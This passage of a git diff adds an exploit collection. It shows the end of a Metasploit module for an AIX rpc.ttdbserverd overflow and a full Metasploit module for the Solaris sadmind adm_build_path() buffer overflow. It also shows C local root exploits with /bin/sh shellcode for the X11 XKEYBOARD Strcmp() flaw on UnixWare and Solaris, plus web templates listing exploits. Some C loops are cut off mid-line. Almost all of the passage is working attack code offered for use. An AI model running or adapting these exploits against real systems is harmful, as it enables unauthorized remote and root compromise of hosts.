5.3.9 5.3.8 5.3.7', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20096ba0+4096, + 'Addr1' => 0x2ff1ff14-8192, + 'AIX' => '5.3.9', + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20096ba0-8192 }, + 'Stop' => { 'Ret' => 0x20096ba0+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 5.3.10', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20096bf0+4096, + 'Addr1' => 0x2ff1ff14-8192, + 'AIX' => '5.3.10', + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20096bf0-8192 }, + 'Stop' => { 'Ret' => 0x20096bf0+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 5.3.9', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20096ba0+4096, + 'Addr1' => 0x2ff1ff14-8192, + 'AIX' => '5.3.9', + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20096ba0-8192 }, + 'Stop' => { 'Ret' => 0x20096ba0+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 5.3.8', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20096c10+4096, + 'Addr1' => 0x2ff1ff98-8192, + 'AIX' => '5.3.8', + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20096c10-8192 }, + 'Stop' => { 'Ret' => 0x20096c10+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'IBM AIX Version 5.3.7', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0x20096c10+4096, + 'Addr1' => 0x2ff1ff98-8192, + 'AIX' => '5.3.7', + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x20096c10-8192 }, + 'Stop' => { 'Ret' => 0x20096c10+8192 }, + 'Step' => 1024 + } + } + ], + [ + 'Debug IBM AIX Version 6.1', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0xaabbccdd, + 'Addr1' => 0xddccbbaa, + 'AIX' => '6.1.4', + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0xaabbccdd }, + 'Stop' => { 'Ret' => 0xaabbccdd }, + 'Step' => 1024 + } + } + ], + [ + 'Debug IBM AIX Version 5.3', + { + 'Arch' => 'ppc', + 'Platform' => 'aix', + 'Ret' => 0xaabbccdd, + 'Addr1' => 0xddccbbaa, + 'AIX' => '5.3.10', + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0xaabbccdd }, + 'Stop' => { 'Ret' => 0xaabbccdd }, + 'Step' => 1024 + } + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '2009-06-17')) + + end + + def brute_exploit(brute_target) + + if not @aixpayload + datastore['AIX'] = target['AIX'] + @aixpayload = regenerate_payload.encoded + end + + print_status("Trying to exploit rpc.ttdbserverd with address 0x%08x..." % brute_target['Ret']) + + begin + + sunrpc_create('tcp', 100083, 1) + + if target['AIX'] =~ /6\./ + buf = "A" + else + buf = "AA" + end + + buf << [target['Addr1']].pack('N') * (1022 + 8) + buf << [brute_target['Ret']].pack('N') * 32 + + if target['AIX'] =~ /6\./ + buf << "AAA" + else + buf << "AA" + end + + buf << "\x7f\xff\xfb\x78" * 1920 + buf << @aixpayload + buf = Rex::Encoder::XDR.encode(buf, 2, 0x78000000, 2, 0x78000000) + + print_status('Sending procedure 15 call message...') + sunrpc_call(15, buf) + + sunrpc_destroy + handler + + rescue Rex::Proto::SunRPC::RPCTimeout + # print_error('RPCTimeout') + rescue EOFError + # print_error('EOFError') + end + end +end diff --git a/sadmind_adm_build_path.rb b/sadmind_adm_build_path.rb new file mode 100644 index 0000000..170d4ab --- /dev/null +++ b/sadmind_adm_build_path.rb @@ -0,0 +1,166 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::SunRPC + include Msf::Exploit::Brute + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Sun Solaris sadmind adm_build_path() Buffer Overflow', + 'Description' => %q{ + This module exploits a buffer overflow vulnerability in adm_build_path() + function of sadmind daemon. + + The distributed system administration daemon (sadmind) is the daemon used by + Solstice AdminSuite applications to perform distributed system administration + operations. + + The sadmind daemon is started automatically by the inetd daemon whenever a + request to invoke an operation is received. The sadmind daemon process + continues to run for 15 minutes after the last request is completed, unless a + different idle-time is specified with the -i command line option. The sadmind + daemon may be started independently from the command line, for example, at + system boot time. In this case, the -i option has no effect; sadmind continues + to run, even if there are no active requests. + }, + 'Author' => + [ + 'Ramon de C Valle', + 'Adriano Lima ', + ], + 'Arch' => ARCH_X86, + 'Platform' => 'solaris', + 'References' => + [ + ['CVE', '2008-4556'], + ['OSVDB', '49111'], + ['URL', 'http://risesecurity.org/advisories/RISE-2008001.txt'], + ], + 'Privileged' => true, + 'License' => MSF_LICENSE, + 'Payload' => + { + 'Space' => 1024, + 'BadChars' => "\x00", + }, + 'Targets' => + [ + [ + 'Sun Solaris 9 x86 Brute Force', + { + 'Arch' => [ ARCH_X86 ], + 'Platform' => 'solaris', + 'Nops' => 1024 * 32, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x08062030 }, + 'Stop' => { 'Ret' => 0x08072030 }, + 'Step' => 1024 * 30, + } + } + ], + [ + 'Sun Solaris 9 x86', + { + 'Nops' => 1024 * 4, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0x08066a60 + 2048 }, + 'Stop' => { 'Ret' => 0x08066a60 + 2048 }, + 'Step' => 1, + } + } + ], + [ + 'Debug', + { + 'Nops' => 1024 * 4, + 'Bruteforce' => + { + 'Start' => { 'Ret' => 0xaabbccdd }, + 'Stop' => { 'Ret' => 0xaabbccdd }, + 'Step' => 1, + } + } + ], + ], + 'DefaultTarget' => 0, + 'DisclosureDate' => '2008-10-14' + )) + + end + + def brute_exploit(brute_target) + begin + sunrpc_create('udp', 100232, 10) + rescue Rex::Proto::SunRPC::RPCTimeout, Rex::Proto::SunRPC::RPCError => e + vprint_error(e.to_s) + return + end + + unless @nops + print_status('Creating nop block...') + if target['Nops'] > 0 + @nops = make_nops(target['Nops']) + else + @nops = '' + end + end + + print_status("Trying to exploit sadmind with address 0x%.8x..." % brute_target['Ret']) + + hostname = 'localhost' + + # buf1 = rand_text_alpha(1017) + [brute_target['Ret']].pack('L') + buf1 = "A" * 1017 + [brute_target['Ret']].pack('L') + buf2 = @nops + payload.encoded + + header = + Rex::Encoder::XDR.encode(0) * 7 + + Rex::Encoder::XDR.encode(6, 0, 0, 0, 4, 0, 4, 0x7f000001, 100232, 10, + 4, 0x7f000001, 100232, 10, 17, 30, 0, 0, 0, 0, + hostname, 'system', rand_text_alpha(16)) + + body = + do_int('ADM_FW_VERSION', 1) + + do_string('ADM_LANG', 'C') + + do_string('ADM_REQUESTID', '00009:000000000:0') + + do_string('ADM_CLASS', 'system') + + do_string('ADM_CLASS_VERS', '2.1') + + do_string('ADM_METHOD', buf1) + + do_string('ADM_HOST', hostname) + + do_string('ADM_CLIENT_HOST', hostname) + + do_string('ADM_CLIENT_DOMAIN', '') + + do_string('ADM_TIMEOUT_PARMS', 'TTL=0 PTO=20 PCNT=2 PDLY=30') + + do_int('ADM_FENCE', 0) + + do_string('X', buf2) + + Rex::Encoder::XDR.encode('netmgt_endofargs') + + request = header + Rex::Encoder::XDR.encode(header.length + body.length - 326) + body + + begin + # two seconds timeout for brute force + sunrpc_call(1, request, 2) + rescue Rex::Proto::SunRPC::RPCTimeout + print_status('Server did not respond, this is expected') + rescue Rex::Proto::SunRPC::RPCError => e + print_error(e.to_s) + end + + sunrpc_destroy + handler + end + + def do_string(str1, str2) + Rex::Encoder::XDR.encode(str1, 9, str2.length + 1, str2, 0, 0) + end + + def do_int(str, int) + Rex::Encoder::XDR.encode(str, 3, 4, int, 0, 0) + end +end diff --git a/sco-x86-xkb.c b/sco-x86-xkb.c new file mode 100644 index 0000000..7c4bdaf --- /dev/null +++ b/sco-x86-xkb.c @@ -0,0 +1,85 @@ +/* + * X11R6 XKEYBOARD extension Strcmp() for SCO UnixWare 7.1.3 x86 + * Copyright 2006 RISE Security , + * Ramon de Carvalho Valle + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + * + */ + +#include +#include +#include +#include + +#define ADRSIZE 1024 +#define NOPSIZE 4096 + +char shellcode[]= /* 43 bytes */ + "\x68\xff\xf8\xff\x3c" /* pushl $0x3cfff8ff */ + "\x6a\x65" /* pushl $0x65 */ + "\x89\xe6" /* movl %esp,%esi */ + "\xf7\x56\x04" /* notl 0x04(%esi) */ + "\xf6\x16" /* notb (%esi) */ + "\x31\xc0" /* xorl %eax,%eax */ + "\x50" /* pushl %eax */ + "\xb0\x17" /* movb $0x17,%al */ + "\xff\xd6" /* call *%esi */ + "\x31\xc0" /* xorl %eax,%eax */ + "\x50" /* pushl %eax */ + "\x68\x2f\x2f\x73\x68" /* pushl $0x68732f2f */ + "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */ + "\x89\xe3" /* movl %esp,%ebx */ + "\x50" /* pushl %eax */ + "\x50" /* pushl %eax */ + "\x53" /* pushl %ebx */ + "\xb0\x3b" /* movb $0x3b,%al */ + "\xff\xd6" /* call *%esi */ +; + +int main(int argc,char **argv){ + char buf[8192],display[256],addr[4],*envp[4],*p; + int i; + + printf("X11R6 XKEYBOARD extension Strcmp() for SCO UnixWare 7.1.3 x86\n"); + printf("Copyright 2006 RISE Security \n\n"); + + if(argc!=2){ + fprintf(stderr,"usage: %s xserver:display\n",argv[0]); + exit(EXIT_FAILURE); + } + + snprintf(display,sizeof(display),"DISPLAY=%s",argv[1]); + + *((unsigned int *)addr)=(unsigned int)buf+2048+256+1024+2048+1; + + p=buf; + sprintf(p,"_XKB_CHARSET="); + p=buf+13; + for(i=0;i<256;i++) *p++='A'; + for(i=0;i, + * Ramon de Carvalho Valle + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + * + */ + +/* + * Compile with the following command. + * $ (g)cc -Wall -ldl -o sol-sparc-xkb sol-sparc-xkb.c + * + * Set the DISPLAY environment variable to a X Window System server with + * XKEYBOARD extension enabled. + * $ ./sol-sparc-xkb sprintf|strcpy xserver:display + * + */ + +#include +#include +#include +#include +#include +#include +#include +#include + +#define BUFSIZE 13+256+64+2+1 +#define FRMSIZE 64+3+1 +#define ADRSIZE 2047+1 +#define SHLSIZE strlen(shellcode)+1 +#define DSPSIZE strlen(display)+1 +#define ARGSIZE 7+1 +#define ENVSIZE BUFSIZE+FRMSIZE+ADRSIZE+SHLSIZE+DSPSIZE +#define PFMSIZE strlen(platform)+1 +#define PRGSIZE 20+1 + +#define PAD(a,b,c) \ + a+=((b+c)%2)?(((a%8)>4)?(16-(a%8)):(8-(a%8))):((a%8)?(12-(a%8)):4); + +char shellcode[]= /* 60 bytes */ + "\x90\x1a\x40\x09" /* xor %o1,%o1,%o0 */ + "\x82\x10\x20\x17" /* mov 0x17,%g1 */ + "\x91\xd0\x20\x08" /* ta 0x08 */ + "\x21\x0b\xd8\x9a" /* sethi %hi(0x2f62696e),%l0 */ + "\xa0\x14\x29\x6e" /* or %l0,0x96e,%l0 */ + "\x23\x0b\xdc\xda" /* sethi %hi(0x2f736800),%l1 */ + "\x90\x23\xa0\x08" /* sub %sp,0x08,%o0 */ + "\x92\x23\xa0\x10" /* sub %sp,0x10,%o1 */ + "\x94\x1a\x80\x0a" /* xor %o2,%o2,%o2 */ + "\xe0\x23\xbf\xf8" /* st %l0,[%sp-0x08] */ + "\xe2\x23\xbf\xfc" /* st %l1,[%sp-0x04] */ + "\xd0\x23\xbf\xf0" /* st %o0,[%sp-0x10] */ + "\xc0\x23\xbf\xf4" /* st %g0,[%sp-0x0c] */ + "\x82\x10\x20\x3b" /* mov 0x3b,%g1 */ + "\x91\xd0\x20\x08" /* ta 0x08 */ +; + +void *find_symbol(const char *symbol){ + void *handle,*addr; + char *err; + + if((handle=dlmopen(LM_ID_LDSO,NULL,RTLD_LAZY))==NULL){ + fprintf(stderr,"%s\n",dlerror()); + exit(EXIT_FAILURE); + } + + dlerror(); + addr=dlsym(handle,symbol); + if((err=dlerror())!=NULL){ + fprintf(stderr,"%s\n",err); + exit(EXIT_FAILURE); + } + + dlclose(handle); + + return addr; +} + +void *find_rwxmem(void){ + FILE *fp; + prmap_t map; + int flags; + void *addr; + + if((fp=fopen("/proc/self/map","rb"))==NULL){ + perror("fopen"); + exit(EXIT_FAILURE); + } + + while(fread(&map,sizeof(map),1,fp)){ + flags=map.pr_mflags; + + if((flags&(MA_READ|MA_WRITE|MA_EXEC))==(MA_READ|MA_WRITE|MA_EXEC)){ + if(flags&MA_STACK) continue; + addr=(void *)map.pr_vaddr; + } + } + + fclose(fp); + + return addr; +} + +int main(int argc,char **argv){ + char buf[8192],display[256],platform[256],addr[8][4],*envp[6],*p; + int base,offset,i,flag=0; + + printf("X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 SPARC\n"); + printf("Copyright 2006 RISE Security \n\n"); + + if(argc!=3){ + fprintf(stderr,"usage: %s sprintf|strcpy xserver:display\n",argv[0]); + exit(EXIT_FAILURE); + } + + if(!strcmp(argv[1],"sprintf")) flag=1; + if(!strcmp(argv[1],"strcpy")) flag=2; + + if(!flag){ + fprintf(stderr,"usage: %s sprintf|strcpy xserver:display\n",argv[0]); + exit(EXIT_FAILURE); + } + + snprintf(display,sizeof(display),"DISPLAY=%s",argv[2]); + + if(sysinfo(SI_PLATFORM,platform,sizeof(platform))==-1){ + perror("sysinfo"); + exit(EXIT_FAILURE); + } + + base=((int)argv[0]|0xffff); + base++; + + offset=ARGSIZE+ENVSIZE+PFMSIZE+PRGSIZE; + PAD(offset,1,sizeof(envp)-1); + + *((int *)addr[0])=base-offset+ARGSIZE+BUFSIZE; + *((int *)addr[1])=base-offset+ARGSIZE+BUFSIZE+FRMSIZE; + *((int *)addr[2])=base-offset+ARGSIZE+BUFSIZE+FRMSIZE+ADRSIZE; + + switch(flag){ + case 1: *((int *)addr[3])=(int)find_symbol("sprintf")-4; break; + case 2: *((int *)addr[3])=(int)find_symbol("strcpy")-4; + } + + *((int *)addr[4])=(int)find_rwxmem()+4; + *((int *)addr[5])=*((int *)addr[4])-8; + + p=buf; + sprintf(p,"_XKB_CHARSET="); + p=buf+13; + for(i=0;i<256;i++) *p++='A'; + for(i=0;i<66;i++) *p++=addr[1][i%4]; + *p='\0'; + + memcpy(buf+13+256+56,addr[0],4); + memcpy(buf+13+256+60,addr[3],4); + + p=buf+1024;; + for(i=0;i<(FRMSIZE-1);i++) *p++=addr[1][i%4]; + *p='\0'; + + memcpy(buf+1024+32,addr[4],4); + memcpy(buf+1024+36,addr[2],4); + memcpy(buf+1024+60,addr[5],4); + + p=buf+2048; + for(i=0;i<(ADRSIZE-1);i++) *p++=addr[1][i%4]; + *p='\0'; + + envp[0]=&buf[0]; + envp[1]=&buf[1024]; + envp[2]=&buf[2048]; + envp[3]=shellcode; + envp[4]=display; + envp[5]=NULL; + + execle("/usr/dt/bin/dtaction","AAAAAAA",0,envp); + + exit(EXIT_FAILURE); +} + diff --git a/sol-x86-xkb.c b/sol-x86-xkb.c new file mode 100644 index 0000000..0f5c63a --- /dev/null +++ b/sol-x86-xkb.c @@ -0,0 +1,88 @@ +/* + * X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 x86 + * Copyright 2006 RISE Security , + * Ramon de Carvalho Valle + * + * This program is free software; you can redistribute it and/or modify + * it under the terms of the GNU General Public License as published by + * the Free Software Foundation; either version 2 of the License, or + * (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, write to the Free Software + * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA + * + */ + +#include +#include +#include +#include + +#define ADRSIZE 1024 +#define NOPSIZE 4096 + +char shellcode[]= /* 47 bytes */ + "\x68\xff\xf8\xff\x3c" /* pushl $0x3cfff8ff */ + "\x6a\x65" /* pushl $0x65 */ + "\x89\xe6" /* movl %esp,%esi */ + "\xf7\x56\x04" /* notl 0x04(%esi) */ + "\xf6\x16" /* notb (%esi) */ + "\x31\xc0" /* xorl %eax,%eax */ + "\x50" /* pushl %eax */ + "\xb0\x17" /* movb $0x17,%al */ + "\xff\xd6" /* call *%esi */ + "\x31\xc0" /* xorl %eax,%eax */ + "\x50" /* pushl %eax */ + "\x68\x2f\x6b\x73\x68" /* pushl $0x68736b2f */ + "\x68\x2f\x62\x69\x6e" /* pushl $0x6e69622f */ + "\x89\xe3" /* movl %esp,%ebx */ + "\x50" /* pushl %eax */ + "\x53" /* pushl %ebx */ + "\x89\xe1" /* movl %esp,%ecx */ + "\x50" /* pushl %eax */ + "\x51" /* pushl %ecx */ + "\x53" /* pushl %ebx */ + "\xb0\x3b" /* movb $0x3b,%al */ + "\xff\xd6" /* call *%esi */ +; + +int main(int argc,char **argv){ + char buf[8192],display[256],addr[4],*envp[4],*p; + int i; + + printf("X11R6 XKEYBOARD extension Strcmp() for Sun Solaris 8 9 10 x86\n"); + printf("Copyright 2006 RISE Security \n\n"); + + if(argc!=2){ + fprintf(stderr,"usage: %s xserver:display\n",argv[0]); + exit(EXIT_FAILURE); + } + + snprintf(display,sizeof(display),"DISPLAY=%s",argv[1]); + + *((unsigned int *)addr)=(unsigned int)buf+256+1024+2048+1; + + p=buf; + sprintf(p,"_XKB_CHARSET="); + p=buf+13; + for(i=0;i<256;i++) *p++='A'; + for(i=0;i + + + + + + + Name + Published + Updated + + + + {%- for exploit in site.data.exploits %} + + {{ exploit.name }} + {{ exploit.published | date: "%F" }} + {{ exploit.updated | date: "%F" }} + + {%- endfor %} + + diff --git a/templates/exploits.json.liquid b/templates/exploits.json.liquid new file mode 100644 index 0000000..012e036 --- /dev/null +++ b/templates/exploits.json.liquid @@ -0,0 +1,14 @@ +--- +permalink: exploits.json +--- + +[ +{%- for exploit in site.data.exploits %} + { + "name": "{{ exploit.name }}", + "published": "{{ exploit.published | date: "%F" }}", + "updated": "{{ exploit.updated | date: "%F" }}", + "url": "{{ exploit.url }}" + }, +{%- endfor %} +] diff --git a/templates/exploits.yml.liquid b/templates/exploits.yml.liquid new file mode 100644 index 0000000..2682db3 --- /dev/null +++ b/templates/exploits.yml.liquid @@ -0,0 +1,11 @@ +--- +permalink: exploits.yml +--- + +--- +{%- for exploit in site.data.exploits %} +- name: {{ exploit.name }} + published: {{ exploit.published | date: "%F" }} + updated: {{ exploit.updated | date: "%F" }} + url: {{ exploit.url }} +{%- endfor %}